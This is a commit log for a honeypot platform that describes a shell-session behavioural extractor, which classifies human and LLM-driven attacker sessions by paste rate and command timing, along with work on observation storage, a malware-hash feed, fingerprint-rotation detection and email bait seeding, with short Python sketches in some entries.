BEHAVE-EXTRACTOR.md Phase A Step 10. Closes the discriminative
floor: six primitives emit, the five-class calibration grid is the
binding regression test for every subsequent phase.

* Phase A checklist boxes (Steps 0-10) ticked in
  development/BEHAVE-EXTRACTOR.md.
* Phase A completion log appended inline to the design doc per
  the "append phase logs to design docs" memory rule — captures
  per-primitive confidence ranges and the 2026-05-02 empirical
  anchors that drove threshold calibration.
* Hard gate: tests/profiler/behave_shell/test_calibration_grid.py
  parametrised over five class shards, all green; skips cleanly
  on BEHAVE_CALIBRATION_DIR unset.

Phases B-G expand horizontally across the registry. Phase H is
the full-corpus lockdown + v0 release. Worker
(BEHAVE-INTEGRATION.md Phase 4) is unblocked at this milestone —
it can wire per-session production against the Phase A engine
without waiting for the rest of the Tier-A corpus.
2026-05-03 08:02:02 -04:00
640294f3dc test(profiler/behave_shell): five-class calibration grid lockdown
BEHAVE-EXTRACTOR.md Phase A Step 9 — the gate. Runs the pure
engine against each of the five 2026-05-02 calibration shards and
pins the contract that all subsequent Phase B-G PRs must keep
green: every Phase A primitive (motor.input_modality,
motor.paste_burst_rate, cognitive.inter_command_latency_class,
cognitive.command_branch_diversity, cognitive.feedback_loop_engagement,
cognitive.inter_command_consistency) fires at least once per shard.

* tests/profiler/behave_shell/test_calibration_grid.py
  parametrized over (shard_file, class_label) for HUMAN / YOU-sim /
  LW-sim / CLAUDE-FF / CLAUDE-CL. Skips entirely when
  BEHAVE_CALIBRATION_DIR is unset (CI provides the path; local dev
  doesn't have to).
* Plus a discrimination-smoke check: at least one primitive
  produces different majority values across present classes —
  catches the "constant-output regression" failure mode where the
  engine quietly degenerates to a stub.

Calibration tweak: BRANCH_DIVERSITY_LINEAR_MIN dropped from 0.80 to
0.70 to align with the prototype's empirical anchors (CLAUDE-CL ≈
0.55-0.60 adaptive; YOU-sim / CLAUDE-FF scripted recon ≈ 0.75+
linear). Test for the middle band re-pinned at the new boundary.

Per-class value pinning (e.g. HUMAN must emit
inter_command_consistency=bimodal) is intentionally NOT a hard gate
yet — v0.1 thresholds put real human sessions in "variable", and
true bimodal detection (Hartigan dip / two-peak) is registry-flagged
for v0.2. Tighter pinning lands as the corpus grows.
2026-05-03 08:00:50 -04:00
842b7de950 feat(profiler/behave_shell): emit cognitive.inter_command_consistency
BEHAVE-EXTRACTOR.md Phase A Step 8. Dispersion / bimodality of
inter-command pauses. HUMAN-bimodal vs LLM-metronomic.

* _features/cognitive.py:inter_command_consistency(ctx) emits one
  Observation in {metronomic, variable, bimodal}.
* CV = stdev / mean of ctx.inter_cmd_iats. CV < 0.40 → metronomic
  (LLM-pure; corpus anchor 0.24); CV ≥ 1.50 → bimodal heuristic
  (LLM-assisted human; v0.1 placeholder, true bimodal via Hartigan
  dip is registry-flagged for v0.2); else → variable (human;
  corpus anchor 0.94).
* < 2 IATs or zero mean → skip emission. < 5 commands halves
  confidence (0.40 vs 0.75) per sample-size honesty.

Tests: too-few IATs → no emission, uniform → metronomic,
human-like dispersion → variable, extreme bursts+gaps → bimodal,
low-sample-count → reduced confidence.

Step 8 closes the six-primitive calibration floor for Phase A.
Step 9 (calibration grid lockdown) is the gate that pins it.
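
A minimal sketch of the CV bucketing above, assuming sample standard deviation and returning a `(value, confidence)` pair. The constant names are hypothetical; the 0.40 / 1.50 cut-offs and the 0.75 / 0.40 confidences are the ones quoted in the message.

```python
from statistics import mean, stdev

CV_METRONOMIC_MAX = 0.40
CV_BIMODAL_MIN = 1.50
MIN_COMMANDS_FOR_FULL_CONFIDENCE = 5


def inter_command_consistency(inter_cmd_iats, n_commands):
    """Return (value, confidence), or None when the emit should be skipped."""
    if len(inter_cmd_iats) < 2:
        return None
    m = mean(inter_cmd_iats)
    if m == 0:
        return None
    cv = stdev(inter_cmd_iats) / m
    if cv < CV_METRONOMIC_MAX:
        value = "metronomic"
    elif cv >= CV_BIMODAL_MIN:
        value = "bimodal"      # v0.1 heuristic, not a true bimodality test
    else:
        value = "variable"
    confidence = 0.75 if n_commands >= MIN_COMMANDS_FOR_FULL_CONFIDENCE else 0.40
    return value, confidence
```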
2026-05-03 07:56:49 -04:00
2f8c107e70 feat(profiler/behave_shell): emit cognitive.feedback_loop_engagement
BEHAVE-EXTRACTOR.md Phase A Step 7. The orthogonal axis — does the
operator's pause-after-command correlate with bytes of output they
just saw? Splits HUMAN/CLAUDE-CL (closed_loop) from LW-sim/CLAUDE-FF
(fire_and_forget); cuts ACROSS the LLM/human axis.

* _features/cognitive.py:feedback_loop_engagement(ctx) emits one
  Observation in {closed_loop, fire_and_forget, unknown}.
* Pearson correlation between ctx.output_per_cmd[i] and
  ctx.inter_cmd_iats[i] (paired by construction in Step 4); via
  statistics.correlation with constant-series fallback to "unknown".
* r > FEEDBACK_CORRELATION_MIN (0.30) → closed_loop; otherwise
  (zero, negative, or undefined) → fire_and_forget.
* First primitive that depends on output events: zero output events
  in the shard or fewer than FEEDBACK_MIN_PAIRS (5) pairs → emit
  "unknown" at confidence 1.0 (the absence-of-data is itself a
  high-confidence answer). Zero-command session skips entirely.

Tests: no-output → unknown, few-pairs → unknown, strong positive r
→ closed_loop, constant pace → fire_and_forget/unknown,
negative r → fire_and_forget.
2026-05-03 07:55:38 -04:00
3fc6ea5f75 feat(profiler/behave_shell): emit cognitive.command_branch_diversity
BEHAVE-EXTRACTOR.md Phase A Step 6. Content-based playbook-vs-
adaptive split. Splits CLAUDE-FF (linear_playbook, ~10 distinct
tools) from CLAUDE-CL (adaptive_branching, 5-6 tools with curl
re-invoked) per the 2026-05-02 empirical anchor.

* _features/cognitive.py:command_branch_diversity(ctx) emits one
  Observation in {linear_playbook, adaptive_branching, unknown}.
* unique_first_token_hashes / total_commands ratio. ≥ 0.80 →
  linear_playbook, otherwise adaptive_branching (the doc instructs
  bias-to-adaptive in the middle band — that's the discriminative
  signal we actually want).
* < 5 commands → "unknown" at confidence 1.0 (the absence of data
  is itself a high-confidence answer per the registry's allowed
  vocabulary). Zero-command session skips emission entirely.

Tests cover unique-tokens → linear, repeated-tokens → adaptive,
middle band → adaptive (bias), under-floor → unknown @ 1.0, plus
PII regression: raw tokens never appear in the serialised
observation.
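
A short sketch of the ratio rule in this commit, using the 0.80 boundary as it stood here. It operates on a list of first-token hashes; the constant names are hypothetical.

```python
BRANCH_DIVERSITY_LINEAR_MIN = 0.80   # boundary as of this commit
MIN_COMMANDS = 5


def command_branch_diversity(first_token_hashes):
    """Return a label, or None for a zero-command session (no emit)."""
    total = len(first_token_hashes)
    if total == 0:
        return None
    if total < MIN_COMMANDS:
        return "unknown"             # emitted at confidence 1.0 per the message
    ratio = len(set(first_token_hashes)) / total
    # Anything under the boundary, including the middle band, biases to adaptive.
    return "linear_playbook" if ratio >= BRANCH_DIVERSITY_LINEAR_MIN else "adaptive_branching"
```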
2026-05-03 07:54:13 -04:00
e52a0e0381 feat(profiler/behave_shell): emit cognitive.inter_command_latency_class
BEHAVE-EXTRACTOR.md Phase A Step 5. Classifies the operator's
thinking pace between commands. Splits LW-sim / CLAUDE-FF /
CLAUDE-CL.

* _features/cognitive.py:inter_command_latency_class(ctx) emits one
  Observation in {instant, typing_speed, deliberate,
  llm_lightweight, llm_heavyweight, long}, computed as the median
  of ctx.inter_cmd_iats bucketed against the prototype thresholds
  (v0.2 split: lightweight 2-8s, heavyweight 8-30s).
* Sample-size honesty: < 5 commands halves confidence (0.40 vs
  0.80) per BEHAVE-EXTRACTOR.md.
* Threshold consts (INTER_CMD_*_MAX, MIN_COMMANDS_FOR_FULL_CONFIDENCE,
  plus parked Step 6/7/8 thresholds for the next three commits)
  added to _thresholds.py.

Tests cover all six buckets at empirically-anchored IATs (15s ≈
Claude Opus driving recon via tmux send-keys), plus the
single-command no-IAT and low-sample-count paths.
2026-05-03 07:52:39 -04:00
f3880b24d1 feat(profiler/behave_shell): command segmentation in SessionContext
BEHAVE-EXTRACTOR.md Phase A Step 4. Pure refactor inside _ctx.py —
no new feature emits. Lays the shared utility for the three
cognitive primitives next in line (Steps 5-7).

* Command dataclass (frozen): start_ts, end_ts, first_token_hash.
  PII-safe by construction — only the first whitespace-delimited
  token of the command is retained, and only as a sha256 hash
  (decnet/profiler/behave_shell/_parse.py:hash_token).
* _segment_commands walks input events char-by-char, splits on
  \r / \n, hashes the first token, drops the rest.
* SessionContext gains commands, inter_cmd_iats, output_per_cmd.
  output_per_cmd[i] counts bytes between commands[i].end_ts and
  commands[i+1].start_ts — the natural pairing for Step 7
  (feedback_loop_engagement).

Tests: empty / unterminated streams, single command (CR + LF
terminators), paste-with-newline, multi-command IAT pairing,
output-byte counting between boundaries, blank-line skip,
first-token-only PII discipline.
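
A minimal sketch of the segmentation walk, assuming input events arrive as `(timestamp, data)` pairs. The `Command` fields and `hash_token` follow the names in the message; the event shape and the public name `segment_commands` are assumptions of this sketch.

```python
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Command:
    start_ts: float
    end_ts: float
    first_token_hash: str


def hash_token(token: str) -> str:
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


def segment_commands(input_events):
    """Split the input stream on CR/LF; keep only a hash of the first token."""
    commands, buf, start_ts = [], [], None
    for ts, data in input_events:
        for ch in data:
            if ch in "\r\n":
                tokens = "".join(buf).split()
                if tokens:  # blank lines produce no command
                    commands.append(Command(start_ts, ts, hash_token(tokens[0])))
                buf, start_ts = [], None
            else:
                if start_ts is None:
                    start_ts = ts
                buf.append(ch)
    return commands  # an unterminated trailing line is dropped
```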
2026-05-03 07:50:55 -04:00
6763fceb0b feat(profiler/behave_shell): emit motor.paste_burst_rate
BEHAVE-EXTRACTOR.md Phase A Step 3. Same paste-event ratio as
motor.input_modality but coarser-bucketed: this is the *habit*
signal (does the operator reach for paste at all?), where
input_modality is the dominant-channel signal.

* _features/motor.py:paste_burst_rate(ctx) emits one Observation
  per session in {none, occasional, habitual} with confidence
  0.70 / 0.70 / 0.80.
* Thresholds: PASTE_RATE_OCCASIONAL_MIN=0.10,
  PASTE_RATE_HABITUAL_MIN=0.50.

Splits YOU-sim from LW/CLAUDE-FF/CLAUDE-CL — LLM-driven sessions
paste habitually, real humans rarely paste.

Tests: pure-typed → none; 1-paste-in-10 → occasional;
paste-majority → habitual; output-only → no observation; habitual
confidence > occasional confidence.
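
The bucketing above can be sketched as a ratio check. The inclusive lower bounds are inferred from the "1-paste-in-10 → occasional" test and are otherwise an assumption; the function signature is hypothetical.

```python
PASTE_RATE_OCCASIONAL_MIN = 0.10
PASTE_RATE_HABITUAL_MIN = 0.50


def paste_burst_rate(paste_events, total_inputs):
    """Return (value, confidence), or None for an output-only session."""
    if total_inputs == 0:
        return None
    ratio = paste_events / total_inputs
    if ratio >= PASTE_RATE_HABITUAL_MIN:
        return "habitual", 0.80
    if ratio >= PASTE_RATE_OCCASIONAL_MIN:
        return "occasional", 0.70
    return "none", 0.70
```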
2026-05-03 07:49:03 -04:00
879f5e731b feat(profiler/behave_shell): emit motor.input_modality
BEHAVE-EXTRACTOR.md Phase A Step 2. The first primitive — picked
first because it has the highest discriminative value (HUMAN vs
everyone) and the simplest implementation (paste-event ratio over
total inputs).

* _features/motor.py:input_modality(ctx) emits one Observation
  per session in {typed, pasted, mixed} with confidence 0.75 / 0.70.
* _features/_emit.py centralises the make_observation helper so
  every feature module gets the same Window/source/evidence_ref
  boilerplate without copy-paste.
* Thresholds inherited from the prototype's calibration history
  (MODALITY_PASTED_MIN=0.40, MODALITY_TYPED_MAX=0.05).
* Zero-input session skips emission — registry doesn't admit
  "unknown" here.

Tests: pure-typed → typed, pure-pasted → pasted, mixed → mixed,
output-only session → no observation, full envelope round-trip.
2026-05-03 07:47:38 -04:00
c9a81a23c2 feat(profiler/behave_shell): asciinema parser + paste-burst detection
BEHAVE-EXTRACTOR.md Phase A Step 1. Lays the shared primitives that
Steps 2-3 (motor.input_modality, motor.paste_burst_rate) will
consume:

* parse_shard_line / parse_shard turn a shard JSONL line/file into
  AsciinemaEvents, skipping headers and malformed records.
* PasteBurst dataclass + _detect_paste_bursts group consecutive
  paste-class input events (len(d) >= 4 chars per the prototype's
  empirical floor) into contiguous bursts, splitting on IAT gaps
  larger than PASTE_BURST_MAX_IAT_S (200ms).
* SessionContext now carries iats and paste_bursts derivations.
* Threshold constants harvested from
  BEHAVE/prototype_extractors/shell/extract.py — calibrated against
  the five 2026-05-02 shards.

Tests cover pure-typed, pure-pasted, mixed streams; close vs far
paste events; typed events breaking a burst; PasteBurst immutability;
and the JSON parser's junk handling.
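
A hedged sketch of the burst grouping described for `_detect_paste_bursts`, assuming `(timestamp, data)` input events. The `PasteBurst` fields and the name `PASTE_MIN_CHARS` are hypothetical; only the 4-character floor and the 200 ms gap come from the message.

```python
from dataclasses import dataclass

PASTE_MIN_CHARS = 4            # events shorter than this count as typed
PASTE_BURST_MAX_IAT_S = 0.200  # larger gaps start a new burst


@dataclass(frozen=True)
class PasteBurst:
    start_ts: float
    end_ts: float
    n_events: int
    n_chars: int


def detect_paste_bursts(input_events):
    bursts, current = [], []   # current holds (ts, n_chars) of the open burst

    def flush():
        if current:
            bursts.append(PasteBurst(current[0][0], current[-1][0],
                                     len(current), sum(n for _, n in current)))
            current.clear()

    for ts, data in input_events:
        if len(data) < PASTE_MIN_CHARS:
            flush()            # a typed event breaks the burst
            continue
        if current and ts - current[-1][0] > PASTE_BURST_MAX_IAT_S:
            flush()            # too far from the previous paste event
        current.append((ts, len(data)))
    flush()
    return bursts
```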
2026-05-03 07:46:01 -04:00
f8eae04e5d feat(profiler/behave_shell): scaffold extract_session entry point
BEHAVE-EXTRACTOR.md Phase A Step 0. Lays the package skeleton
(__init__/extract/_parse/_ctx/_thresholds/_features) with empty
FEATURES = (), so the worker plumbing in BEHAVE-INTEGRATION Phase 4
has a stable import path before any primitive lands.

extract_session() builds a SessionContext once and fans the
registered feature functions across it; at Step 0 that fan-out is
empty and the function yields nothing. Step 1 (asciinema parser +
paste-burst detector) and Step 2 (motor.input_modality) land next.

Smoke suite asserts the empty contract: empty stream → no
observations, single event → t_start == t_end, multi-event → events
routed into input_events / output_events by kind, evidence_ref
defaults to "session:<sid>" or honours an explicit override.
2026-05-03 07:42:09 -04:00
a2a61b636e feat(web): drop SessionProfile, wire observations into AttackerDetail (DEBT-050 / DEBT-036 closure)
Destructive half of BEHAVE-INTEGRATION.md Phase 1. SessionProfile +
its kd_* columns + the dialect ALTER TABLE migration helpers are
deleted outright; pre-v1, the table shipped empty, no migration
ceremony required (per the no-new-_migrate_-pre-v1 memory rule).
DEBT-036 closes via DEBT-050 supersedure. AttackerDetail's
``observations`` field is wired to the new ``observations`` table
and returns an empty list until the BEHAVE-SHELL extractor (DEBT-050
Phase 2) starts emitting.

decnet/web/db/models/attackers.py — SessionProfile class deleted
(~135 lines), KD_PAUSE_*/KD_START_OF_ACTION_IDLE_S module constants
deleted, module docstring updated to point at the observations
table. AttackerIdentity.kd_digraph_simhash is KEPT — it's the v2
federation centroid hook, not a SessionProfile field; docstring
repointed to the BEHAVE primitive that will populate it.

decnet/web/db/sqlmodel_repo/attackers/sessions.py — DELETED.
SessionProfilesMixin dropped from the AttackersMixin MRO.

decnet/web/db/repository.py — abstract upsert_session_profile +
get_session_profile removed.

decnet/web/db/sqlite/repository.py + mysql/repository.py —
_migrate_session_profile_table helpers and their initialize() calls
removed. mysql initialize() now goes attackers → column_types →
admin (no session_profile step).

decnet/web/db/models/__init__.py — SessionProfile re-export gone.

decnet/web/db/models/attacker_intel.py — docstring cross-reference
to SessionProfile.schema_version retargeted to AttackerIdentity.

decnet/web/router/attackers/api_get_attacker_detail.py — adds
``observations: []`` to the response by calling
``repo.latest_observation_per_primitive(uuid)`` and projecting to a
list sorted by primitive path. Empty until the extractor lands;
shape matches BEHAVE-INTEGRATION.md §"AttackerDetail consumer".

tests/profiler/test_session_profile.py — DELETED (56 lines).
tests/db/test_base_repo.py — DummyRepo loses upsert_session_profile
and get_session_profile overrides.
tests/db/mysql/test_mysql_migration.py — initialize-call-order
assertion updated; session_profile step removed from the expected
sequence; docstring records why.
tests/ttp/test_lifter_absence.py — docstring "no SessionProfile" →
"no ObservationRow".
2026-05-03 07:33:37 -04:00
0972325527 feat(web/db): observations table + repo + bus prefix (BEHAVE-INTEGRATION Phase 1)
Additive Phase 1 of BEHAVE-INTEGRATION.md. Lays the storage layer
the BEHAVE-SHELL extractor (DEBT-050) will write into. Nothing
breaks; SessionProfile coexists for now and is dropped in the
follow-up commit.

decnet/web/db/models/observations.py — new ObservationRow SQLModel
mirroring the BEHAVE Observation envelope field-for-field
(core/decnet_behave_core/spec/envelope.py). ``id`` is a hex-string
UUID (matching BEHAVE), not a typed UUID column. ``identity_ref``
is str | None — written by the future attribution engine, NULL
until then. ``attacker_uuid`` is the one DECNET-side
denormalisation; FK'd to attackers.uuid for cheap AttackerDetail
joins. ``evidence_ref`` is NOT NULL for DECNET emissions even
though the upstream envelope makes it optional — the worker's
"already profiled?" check keys on it. UniqueConstraint(evidence_ref,
primitive) enforces idempotency at the schema level so re-running
the extractor on the same shard+sid produces a DB-side conflict
the upsert path resolves deterministically. Class is named
``ObservationRow`` (not ``Observation``) to avoid colliding with
the BEHAVE Pydantic envelope at sites that import both.

decnet/web/db/sqlmodel_repo/observations.py — ObservationsMixin.
Three public methods backing the canonical queries from
BEHAVE-INTEGRATION.md §"Storage": ``upsert_observation`` (idempotent
on the natural key), ``latest_observation_per_primitive`` (per-
primitive MAX(ts) subquery, portable across SQLite and MySQL — no
DISTINCT ON), ``observations_time_series`` (asc-by-ts). Plus
``has_observations_for_evidence`` for the worker's session-already-
profiled check.

decnet/bus/topics.py — ATTACKER_OBSERVATION_PREFIX = "observation"
constant + ``attacker_observation(primitive)`` builder. Full topic
shape ``attacker.observation.<primitive>`` matches what BEHAVE's
spec.event_adapter.event_topic_for produces upstream. Documentation
+ pattern matching only — bus auth is socket file perms (DEBT-029
§2), not topic-level.

decnet/web/db/repository.py — abstract ``upsert_observation``,
``latest_observation_per_primitive``, ``observations_time_series``
on BaseRepository.

tests/db/test_observations.py — 11 tests covering upsert round-trip,
idempotency under the unique constraint, latest-per-primitive
ordering across multiple sessions, time-series asc-ordering, empty-
attacker contract, every BEHAVE ValueKind round-tripping through
the JSON column, and the has_observations_for_evidence check.

tests/db/test_base_repo.py — DummyRepo gains the three new abstract
overrides so its coverage suite still instantiates.
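
The idempotent upsert and the MAX(ts) subquery can be illustrated with plain `sqlite3`. This is a sketch only: the real mixin is built on SQLModel, the column set here is reduced, and the helper `open_db` is hypothetical. The `ON CONFLICT` upsert syntax is SQLite-specific; the latest-per-primitive query uses no DISTINCT ON.

```python
import sqlite3


def open_db():
    db = sqlite3.connect(":memory:")
    db.execute("""
        CREATE TABLE observations (
            attacker_uuid TEXT NOT NULL,
            evidence_ref  TEXT NOT NULL,
            primitive     TEXT NOT NULL,
            ts            REAL NOT NULL,
            value         TEXT NOT NULL,
            UNIQUE (evidence_ref, primitive)
        )""")
    return db


def upsert_observation(db, attacker_uuid, evidence_ref, primitive, ts, value):
    # Re-running the extractor on the same evidence overwrites, never duplicates.
    db.execute("""
        INSERT INTO observations (attacker_uuid, evidence_ref, primitive, ts, value)
        VALUES (?, ?, ?, ?, ?)
        ON CONFLICT (evidence_ref, primitive)
        DO UPDATE SET ts = excluded.ts, value = excluded.value""",
        (attacker_uuid, evidence_ref, primitive, ts, value))


def latest_observation_per_primitive(db, attacker_uuid):
    return db.execute("""
        SELECT o.primitive, o.value, o.ts
        FROM observations AS o
        JOIN (SELECT primitive, MAX(ts) AS max_ts
              FROM observations WHERE attacker_uuid = ?
              GROUP BY primitive) AS latest
          ON o.primitive = latest.primitive AND o.ts = latest.max_ts
        WHERE o.attacker_uuid = ?
        ORDER BY o.primitive""", (attacker_uuid, attacker_uuid)).fetchall()
```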
2026-05-03 07:25:10 -04:00
11f474556c docs(behave): integration + extractor + attribution design (DEBT-050 / 051)
Three sibling design docs plus DEBT.md updates that supersede the
stale DEBT-036 with a BEHAVE-aligned plan.

development/BEHAVE-INTEGRATION.md — five-phase rollout: storage
(observations table mirroring the BEHAVE Observation envelope plus
one DECNET-side denorm; UniqueConstraint(evidence_ref, primitive)
enforcing idempotency); engine (in decnet/profiler/behave_shell/
sublibrary, no new daemon, not in BEHAVE — DECNET is the engine);
BEHAVE pin; worker wire; UI panel + per-attacker SSE route; live
smoke. Bus payload merges id/ts/v back in to preserve sensor
identifiers across the bus envelope.

development/BEHAVE-EXTRACTOR.md — engine route in eight phases
(A–H). Phase A locks the 6-primitive calibration grid; Phases B–G
expand horizontally; Phase H is the full Tier-A corpus + v0
release. v0 ships every shell-extractable primitive (37 of them);
Tier B is cross-session and lives in the attribution engine; Tier
C is network-domain (toolchain.*) and lives elsewhere.

development/ATTRIBUTION-ENGINE.md — sublibrary inside
decnet/correlation/ that consumes attacker.observation.* events
and emits attribution.profile.* derived state. Five-state machine
(unknown / stable / drifting / conflicted / multi_actor) with per-
ValueKind merge functions. v0 closes DEBT-051; v1 adds the real
clusterer; v2 federation gossip. The bright line forbidding
attribution to natural persons is lifted directly from BEHAVE's
envelope docstring.

development/DEBT.md — DEBT-036 marked STALE; DEBT-050 and
DEBT-051 entries added; summary table + open list updated.
2026-05-03 07:24:19 -04:00
3f080f601d feat(intel,ingester): mal_hash feed + observed_attachments table (DEBT-046)
New MalHashProvider sibling ABC (decnet/intel/base.py) since SHA-256
is a different keyspace from IntelProvider's IPs. MalwareBazaarProvider
mirrors FeodoProvider's bulk-feed shape: 24h refresh via _ensure_fresh
/ _refresh, in-memory set[str] of hex-lowercased hashes, set-membership
lookup. Auth-keyed via DECNET_MALWAREBAZAAR_AUTH_KEY; absent key
silent-no-ops the lane (single warning, no HTTP traffic).

Per-hash observations persist to a new observed_attachments table.
DECNET is a honeypot platform — every attachment hash an attacker
delivers is intel, regardless of whether anyone classified it. Verdict
is sticky: True never downgrades to False/None on subsequent
observations. Out of scope: API surface, federation export, retention.

Ingester _publish_email_received calls the provider for each attachment
sha256, sets mal_hash_match on the bus payload (omitted entirely when
the message had no attachments — keeps R0046's `is True` predicate
silent on hash-less mail, matching pre-paydown behavior), and upserts
the row regardless of provider availability.
2026-05-03 05:56:46 -04:00
03beff3840 feat(orchestrator): authoritative failure-count badge endpoint (DEBT-042)
New GET /api/v1/orchestrator/events/stats?since=1h&success=false&kind=...
backed by repo.count_orchestrator_failures(since_ts, kind), which
counts failed rows across both orchestrator_events and
orchestrator_emails since the cutoff.

Window parser accepts ^\d+[smhd]$, capped at 7d. Today only
success=false is accepted on this surface so the endpoint isn't
accidentally repurposed before the next consumer is properly
designed.

Orchestrator.tsx polls the endpoint on mount + every 30 s and
renders the authoritative DB-derived count instead of deriving from
the in-memory SSE buffer + one paginated page (which silently
excluded failures older than the local window).
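
A minimal sketch of the `since` window parser. Treating "capped at 7d" as a rejection of larger windows (and not as a clamp) is an assumption, and `parse_window` is a hypothetical name.

```python
import re
from datetime import timedelta

_WINDOW_RE = re.compile(r"\d+[smhd]")
_UNIT_SECONDS = {"s": 1, "m": 60, "h": 3600, "d": 86400}
MAX_WINDOW_SECONDS = 7 * 86400


def parse_window(spec: str) -> timedelta:
    """Parse strings like '30s', '15m', '1h', '7d' into a timedelta."""
    # fullmatch is the stricter equivalent of ^\d+[smhd]$ (no trailing newline).
    if not _WINDOW_RE.fullmatch(spec):
        raise ValueError(f"invalid window: {spec!r}")
    seconds = int(spec[:-1]) * _UNIT_SECONDS[spec[-1]]
    if seconds > MAX_WINDOW_SECONDS:
        raise ValueError("window exceeds the 7d cap")
    return timedelta(seconds=seconds)
```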
2026-05-03 05:26:45 -04:00
866a76eccf test(web): scaffold vitest + RTL with Orchestrator seed suite (DEBT-043)
Wire vitest 4 + jsdom + @testing-library/{react,jest-dom,user-event}
+ @vitest/coverage-v8 through vite.config.ts (defineConfig from
vitest/config). src/test/setup.ts registers jest-dom matchers and
RTL cleanup. tsconfig.app.json picks up vitest/globals types.

Seed suite Orchestrator.test.tsx covers the three regressions
called out in DEBT-043: empty-state render, kind-filter toggling
triggers a scoped refetch, mocked stream callback prepends a row.
2026-05-03 05:20:01 -04:00
6c6f97e840 feat(prober,correlation): attacker fingerprint rotation detection (DEBT-032)
When the prober observes a NEW hash for an
(attacker_uuid, port, probe_type) triple it has seen before — VPS
rotation, SSH server rebuild, TLS cert swap — emit a derived
attacker.fingerprint_rotated event carrying both old and new hash.
Detection is a small library (decnet.correlation.fingerprint_rotation)
called inline from the prober at each of the three emit sites
(JARM/HASSH/TCPFP). No new daemon. New AttackerFingerprintState table
holds per-triple last-hash state; Attacker.rotation_count and
Attacker.last_rotation_at are stamped on every diff. Library is sync,
fully unit-tested via injected publish_fn / syslog_fn callbacks.
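
The detection step can be sketched with an in-memory dict standing in for the AttackerFingerprintState table. The function name, the payload keys, and the boolean return are hypothetical; the injected `publish_fn` callback mirrors the testing approach the message describes.

```python
def observe_fingerprint(state, attacker_uuid, port, probe_type, new_hash, publish_fn):
    """Record the latest hash for a triple; publish when it differs from the last one."""
    key = (attacker_uuid, port, probe_type)
    old_hash = state.get(key)
    state[key] = new_hash
    if old_hash is None or old_hash == new_hash:
        return False               # first sighting or unchanged: no rotation
    publish_fn("attacker.fingerprint_rotated", {
        "attacker_uuid": attacker_uuid,
        "port": port,
        "probe_type": probe_type,
        "old_hash": old_hash,
        "new_hash": new_hash,
    })
    return True
```

Passing the publisher in as a callable keeps the library synchronous and lets a test capture events in a list.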
2026-05-03 05:12:51 -04:00
dcd558fd91 chore(infra): pin Docker base images by digest (DEBT-023)
All base images (debian:bookworm-slim, ubuntu:22.04, ubuntu:20.04,
rockylinux:9-minimal, centos:7, alpine:3.19, fedora:39,
kalilinux/kali-rolling, archlinux:latest, honeynet/conpot:latest)
now carry their resolved sha256 digest so 'docker pull' is
deterministic. :tag retained for human readability; @sha256 is what
Docker actually resolves. Refresh procedure documented at the top of
decnet/distros.py.
2026-05-03 04:38:39 -04:00
6e19d3a25a chore(bait): scaffold default seed dir with README
Empty directory tracked via .gitkeep so operators see it on first
clone; README documents the .eml/.json drop-in flow that the IMAP/POP3
compose fragments wire up by default.
2026-05-03 04:30:09 -04:00
b3a96a045f feat(mail): default email_seed → $PROJROOT/bait/ when unset
When service_cfg["email_seed"] is absent, compose_fragment now falls
back to $PROJROOT/bait/ if that directory exists on the host. Lets
operators drop a deployment-wide bait corpus into one place without
threading email_seed through every decky's config. Missing dir keeps
old no-op behavior.
2026-05-03 04:25:24 -04:00
b88d67794d feat(mail): operator-tunable IMAP/POP3 email seed (DEBT-026)
IMAP_EMAIL_SEED / POP3_EMAIL_SEED accept a directory (rglob *.eml +
*.json) or a single .json/.eml. Loaded entries CONCATENATE with the
hardcoded _BAIT_EMAILS — additive to the realism-engine emailgen
output rather than replacing it. JSON dicts require from_addr /
to_addr / subject / body; bare bodies are wrapped into RFC 5322 on
load. compose_fragment reads service_cfg["email_seed"] and bind-mounts
the host path read-only at /var/spool/decnet-emails/seed.
2026-05-03 02:47:06 -04:00
e0b07651fd docs(debt): mark DEBT-047 resolved (EmailLifter disk-reach + ttp agent gate) 2026-05-02 20:07:54 -04:00
79674026dd feat(cli): allow decnet ttp on agents (DEBT-047)
The TTP-tagging worker is now safe to run on agent hosts: EmailLifter
disk-reaches body-aware predicates from the local artifacts tree
(DEBT-035 unblocked filesystem access; DEBT-047 added the helper).

Drop `ttp` from MASTER_ONLY_COMMANDS in cli/gating.py and remove the
defence-in-depth `_require_master_mode("ttp")` call in cli/ttp.py.
`ttp-backfill` walks the master DB and stays master-only.
2026-05-02 20:07:03 -04:00
e972d870de feat(ttp): EmailLifter disk-reach for body-aware predicates (DEBT-047)
R0047 (BEC) and the encoded-payload predicate substring-match against
the email body. Shipping raw body text on the abstracted service bus
is the wrong privacy stance — the bus transport may swap from UNIX
socket to networked at any time, and "loopback today" is not a license
to put PII on the wire.

EmailLifter now opens the .eml lazily from
/var/lib/decnet/artifacts/{decky_id}/smtp/{stored_as} when a body-aware
predicate runs and parses the body in-process via stdlib email +
policy.default. The decoded body is memoized into the payload dict so
multiple body-aware predicates on the same event open the file once.

Bus envelope only carries the artifact pointer (decky_id + stored_as);
raw body bytes never cross the host disk boundary on the agent → master
hop. Filesystem access on agents is unblocked by DEBT-035 (setgid +
group-readable artifacts root, paid 2026-05-02).

The legacy inline body_text path is preserved — when the producer ships
body_text on the bus the helper short-circuits without opening the file.
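
A hedged sketch of the lazy, memoized body load using the stdlib `email` package with `policy.default`. The function name `load_body_text` and the `root` parameter are hypothetical, and path validation is omitted here for brevity.

```python
from email import message_from_bytes, policy
from pathlib import Path

ARTIFACTS_ROOT = Path("/var/lib/decnet/artifacts")


def load_body_text(payload: dict, root: Path = ARTIFACTS_ROOT) -> str:
    """Return the decoded body, opening the .eml at most once per payload."""
    if "body_text" in payload:           # legacy inline path, or already memoized
        return payload["body_text"]
    path = root / payload["decky_id"] / "smtp" / payload["stored_as"]
    msg = message_from_bytes(path.read_bytes(), policy=policy.default)
    part = msg.get_body(preferencelist=("plain", "html"))
    text = part.get_content() if part is not None else ""
    payload["body_text"] = text          # memoize for later predicates
    return text
```

Because the result is written back into the payload dict, a second body-aware predicate on the same event never touches the disk.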
2026-05-02 20:05:54 -04:00
7036a86e76 refactor(artifacts): extract resolve_artifact_path to shared module
Move artifact path validation + symlink-escape check out of the
admin-gated download endpoint into decnet/artifacts/paths.py so the
TTP EmailLifter can disk-reach .eml files at tag-time without
duplicating regex/root logic (DEBT-047).

The router now catches ArtifactPathError and re-raises HTTPException(400);
behavior is unchanged.
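
The validation plus symlink-escape check might look like the sketch below. The signature, the component regex, and the `ValueError` base class are assumptions; only the names `resolve_artifact_path` and `ArtifactPathError` come from the message. `Path.is_relative_to` needs Python 3.9+.

```python
import re
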